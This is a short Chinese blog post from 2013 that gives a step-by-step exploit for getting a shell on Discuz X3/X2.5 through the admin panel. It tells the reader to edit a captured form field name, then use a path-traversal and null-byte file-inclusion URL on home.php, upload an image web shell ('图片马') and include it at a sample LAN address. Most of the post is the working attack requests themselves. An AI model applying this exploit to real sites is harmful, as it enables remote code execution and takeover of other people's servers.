[漏洞]discuz x3/x2.5 最新后台getshell详细利用方法

逛来逛去发现了discuz后台getshell最新漏洞,介分享出来。

用户 – 用户栏目 – 栏目分组 – 提交 – 抓包

Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"


改为

Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

访问

/home.php?mod=spacecpid=../../robots.txt%0057

利用:

1.首先进后台,抓个包

2013-05-24

2.改包


Content-Disposition: form-data; name="settingnew[profilegroupnew][base][available]"

改为

Content-Disposition: form-data; name="settingnew[profilegroupnew][plugin][available]"

提交

2013-05-24

3.提交过后访问
/home.php?mod=spacecpid=../../robots.txt%00


2013-05-24

4.找个地方上传图片马


2013-05-24

5.访问图片马

http://192.168.2.190//home.php?mod=spacecp
id=../../data/attachment/forum/201305/24/122111m1464cdtfkc0stt1.gif%00 


posted @ 2013-05-24 15:54:25 kuye 阅读(56949) 评论(0)
发表评论
昵称
邮箱
网址